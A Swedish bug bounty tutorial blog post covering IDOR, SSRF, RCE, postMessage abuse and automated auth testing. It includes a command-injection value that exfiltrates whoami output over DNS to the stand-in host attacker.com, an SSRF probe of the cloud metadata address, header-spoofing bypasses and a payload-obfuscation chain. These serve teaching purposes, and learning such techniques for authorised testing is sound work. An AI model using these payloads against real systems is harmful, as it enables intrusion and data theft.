Skip to main content
  1. Blogposts/

đŸ•”ïžâ™‚ïž bug bounty-insikter: avslöjar hemligheterna bakom framgĂ„ngsrika hack 🚀

·594 words·3 mins· loading · · ·
Rasmus
Author
Rasmus
Att dela en ide eller tvÄ kan vara bra för hjÀrnan
Table of Contents

🌟 Introduktion: Jakten pĂ„ det digitala guldet
#

TÀnk dig att du Àr en modern skattjÀgare. IstÀllet för guldmynt och juveler letar du efter IDOR-sÄrbarheter och RCE-payloads. Varje bugg du hittar Àr en liten kista fylld med belöningar och erkÀnnande. I den hÀr guiden tar vi en djupdykning i riktiga bug bounty-berÀttelser och avslöjar teknikerna som gjort dem framgÄngsrika.

“En bugg Ă€r som en dörr som Ă€r olĂ„st – du behöver bara veta vilket handtag du ska vrida pĂ„” - OkĂ€nd hackare


🔍 Del 1: SĂ„rbarhetsanalys - FrĂ„n teori till exploatering
#

1. đŸšȘ IDOR: NĂ€r din nyckel passar alla dörrar
#

Vardagsanalogi: TÀnk dig ett hotell dÀr ditt rumsnummer (t.ex. 1005) ocksÄ Àr din nyckel. Vad hÀnder om du testar nyckel 1000?

Teknisk genomgÄng:

GET /api/v3/user/profile/1000 HTTP/1.1
Authorization: Bearer [DIN_TOKEN]

SÄ hÀr gör du:

  1. Bygg en “nyckelring” av ID:n med Burp Intruder
  2. Testa ±500 frÄn ditt eget ID
  3. Leta efter admin-roller eller kÀnslig data

Pro tips:

“AnvĂ€nd Chrome-tillĂ€gget ‘JSON Data Node Viewer’ som en lupp för att snabbt skanna JSON-svar”


2. 🌐 SSRF: Din port till det interna nĂ€tverket
#

Vardagsanalogi: Som att lura en vakthund att hÀmta hemliga dokument frÄn chefens kontor.

Tidsbaserad detektering:

curl -X POST 'https://target.com/api/v2/generate-pdf' -d '{"url":"http://169.254.169.254"}'
# VĂ€nta 8+ sekunder → 504 Timeout = 🎉

Bypass-tekniker:

X-Forwarded-Host: 127.0.0.1
X-Remote-IP: 192.168.1.1

Bonus: Kombinera med PDF-genereringens WebSocket för extra smygighet!


3. đŸ’„ RCE: NĂ€r systemet blir din marionett
#

Vardagsanalogi: Som att skicka falska instruktioner till en pizzabagare som blindt lydar.

DNS-baserad dataexfiltrering:

packageName="legit-pkg; nslookup $(whoami|base64).attacker.com;"

Kodningskedja:

# Din payload blir osynlig:
cat command.txt | base64 | xxd -p | sed 's/../%&/g'

Varning: ⏳ Processer rensas efter 8 sekunder – bli inte avbruten!


đŸ› ïž Del 2: VerktygslĂ„dan - Hacka som en pro
#

1. 📹 Post Message: Cross-origin-trolleri
#

Live-demo i devtools:

// PĂ„ attacker.com:
const win = window.open('https://bank.com/dashboard');
setTimeout(() => {
  win.postMessage('{"user":"admin"}', '*');
}, 3000);

UpptÀck: grep -rnw 'addEventListener("message"' static/js/


2. đŸ€– Auth-Testning pĂ„ autopilot
#

Burp AutoRepeater-magi:

<Replace>Cookie: session=ADMIN_COOKIE</Replace>

Arbetsflöde:

  1. Sniffa en admin-förfrÄgan
  2. Aktivera AutoRepeater
  3. JÀmför 200 OK mellan anvÀndare

3. đŸ•”ïžâ™‚ïž JS-övervakning: Din sĂ€kerhetskamera för kod
#

Python-skript som vakthund:

# monitor_js.py
import requests
from bs4 import BeautifulSoup


```python
def check_js_changes():
    response = requests.get(target_url)
    js_files = [script['src'] for script in BeautifulSoup(response.text).find_all('script')]
    # Varna vid nya endpoints!
*SchemalÀgg med:* `0 * * * * /usr/bin/python3 /opt/monitor_js.py`

---

## đŸ§© Slutgiltiga insikter: Bygg ditt bug bounty-kit

### 🏆 BĂ€sta teknikerna 2024:
1. **IDOR Hunting**: ±500 ID-shift + hybridfuzzing
2. **SSRF Tricks**: Tidsdetektering + header-bypass
3. **RCE Eskalering**: DNS-dataexfiltrering + multi-encoding

### 🧠 Mindset-mantran:
> "Var som en fĂ€ktmĂ€stare – kombinera enkla slag till dödliga kombon"

### đŸ› ïž Verktyg du behöver:
| Verktyg          | AnvÀndning           |
|------------------|---------------------|
| Burp AutoRepeater| Session-bypass      |
| Kiterunner       | Auth-testning       |
| monitor_js.py    | Live-övervakning    |

---

## 🚀 Avslutning: Dags att jaga!

BuggjĂ€gare skapas inte – de formas genom nyfikenhet och systematik. Testa dessa tekniker pĂ„ nĂ€sta bug bounty-event, och kom ihĂ„g:

*"Varje misslyckat försök Àr bara ett steg nÀrmare en crit-severity-utbetalning"*

**Utmaning till dig**:
1. VÀlj en metod frÄn denna guide
2. Applicera pÄ ett CTF eller testmÄl
3. Tweeta resultatet med #BugBountyJourney

*Glöm inte – den största sĂ„rbarheten Ă€r att inte försöka!* đŸ’»đŸ”“

---

📱 **Vill du lĂ€ra dig mer?** Boka in min workshop "Offensiv automatisering för Bug Bounty" – lĂ€nk i bio!

*[Ditt namn] Àr en bug bounty-jÀgare med 5+ Ärs erfarenhet och en passion för att göra internet sÀkrare. Delar kunskap pÄ [Din blogg/Twitter].*

```mermaid
graph TD
  A[Start] --> B{IDOR?}
  B -->|Ja| C[Testa ID-shifting]
  B -->|Nej| D{SSRF?}
  D -->|Ja| E[Fuzza interna IP:n]
  D -->|Nej| F[RCE-test]
  F --> G[Kombinera buggar!]